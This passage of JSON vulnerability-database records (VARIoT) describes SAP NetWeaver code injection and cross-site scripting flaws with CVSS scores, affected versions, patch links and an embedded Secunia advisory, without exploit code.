"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.02",
"versionStartIncluding": "7.00",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.52",
"versionStartIncluding": "7.50",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16682"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "102143"
}
],
"trust": 0.3
},
"cve": "CVE-2017-16682",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-16682",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-16682",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-16682",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201712-418",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Internet Transaction Server (ITS), SAP Basis from 7.00 to 7.02, 7.30, 7.31, 7.40, from 7.50 to 7.52, allows an attacker with administrator credentials to inject code that can be executed by the application and thereby control the behavior of the application. SAP Netweaver is prone to a vulnerability that lets attackers inject and execute arbitrary code. \nSuccessful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "BID",
"id": "102143"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-16682",
"trust": 2.7
},
{
"db": "BID",
"id": "102143",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011211",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201712-418",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "102143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"id": "VAR-201712-0108",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T14:05:37.255000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "December 2017 (2526781)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/12/12/sap-security-patch-day-december-2017/"
},
{
"title": "SAP NetWeaver Internet Transaction Server Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=77124"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "NVD",
"id": "CVE-2017-16682"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2526781"
},
{
"trust": 1.9,
"url": "https://blogs.sap.com/2017/12/12/sap-security-patch-day-december-2017/"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/102143"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16682"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16682"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "102143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "102143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-12T00:00:00",
"db": "BID",
"id": "102143"
},
{
"date": "2018-01-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"date": "2017-12-12T14:29:00.403000",
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"date": "2017-12-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-19T22:01:00",
"db": "BID",
"id": "102143"
},
{
"date": "2018-01-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"date": "2017-12-22T14:34:21.977000",
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"date": "2017-12-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Internet Transaction Server and SAP Basis Code injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
],
"trust": 0.6
}
}
var-201709-1284
Vulnerability from variot
SAP NetWeaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1284",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100784"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100784"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "100784"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100784",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100784"
}
]
},
"id": "VAR-201709-1284",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:55:47.791000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2491480"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100784"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100784"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100784"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100784"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100784"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "100784"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100784"
}
],
"trust": 0.3
}
}
var-201103-0360
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has input validation errors. Passing the \"logger\" parameter to the ViewLogger.jsp and \"class\" parameters passed to the ShowMemLog servlet. Inputs are missing before use, which can result in injecting arbitrary HTML and script code when the malicious data is viewed. Executed on the user's browser. The input of the \"logonUrl\" parameter is missing filtering before returning to the user, which can lead to cross-site scripting attacks. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/
TITLE: SAP NetWeaver Cross-Site Scripting and Script Insertion Vulnerabilities
SECUNIA ADVISORY ID: SA43737
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43737/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43737
RELEASE DATE: 2011-03-14
DISCUSS ADVISORY: http://secunia.com/advisories/43737/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/43737/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43737
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in SAP NetWeaver, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct cross-site scripting attacks.
SOLUTION: Apply fixes (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY: 1, 3, 4) Dmitriy Evdokimov, Digital Security Research Group (DSecRG) 2) Alexey Sintsov, Digital Security Research Group (DSecRG)
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1438191 https://service.sap.com/sap/support/notes/1450270 https://service.sap.com/sap/support/notes/1512776
Digital Security Research Group (DSECRG-11-009, DSECRG-11-010, DSECRG-11-012, DSECRG-11-013): http://dsecrg.com/pages/vul/show.php?id=309 http://dsecrg.com/pages/vul/show.php?id=310 http://dsecrg.com/pages/vul/show.php?id=312 http://dsecrg.com/pages/vul/show.php?id=313
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201103-0360",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 3.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "6.4*"
}
],
"sources": [
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
},
{
"db": "BID",
"id": "46853"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexandr Polyakov and Dmitriy Evdokimo",
"sources": [
{
"db": "BID",
"id": "46853"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has input validation errors. Passing the \\\"logger\\\" parameter to the ViewLogger.jsp and \\\"class\\\" parameters passed to the ShowMemLog servlet. Inputs are missing before use, which can result in injecting arbitrary HTML and script code when the malicious data is viewed. Executed on the user\u0027s browser. The input of the \\\"logonUrl\\\" parameter is missing filtering before returning to the user, which can lead to cross-site scripting attacks. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. ----------------------------------------------------------------------\n\n\nGet a tax break on purchases of Secunia Solutions!\n\nIf you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:\nhttp://secunia.com/products/corporate/vim/section_179/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Cross-Site Scripting and Script Insertion\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA43737\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/43737/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43737\n\nRELEASE DATE:\n2011-03-14\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/43737/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/43737/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43737\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in SAP NetWeaver, which\ncan be exploited by malicious users to conduct script insertion\nattacks and by malicious people to conduct cross-site scripting\nattacks. \n\nSOLUTION:\nApply fixes (please see the vendor\u0027s advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\n1, 3, 4) Dmitriy Evdokimov, Digital Security Research Group (DSecRG)\n2) Alexey Sintsov, Digital Security Research Group (DSecRG)\n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1438191\nhttps://service.sap.com/sap/support/notes/1450270\nhttps://service.sap.com/sap/support/notes/1512776\n\nDigital Security 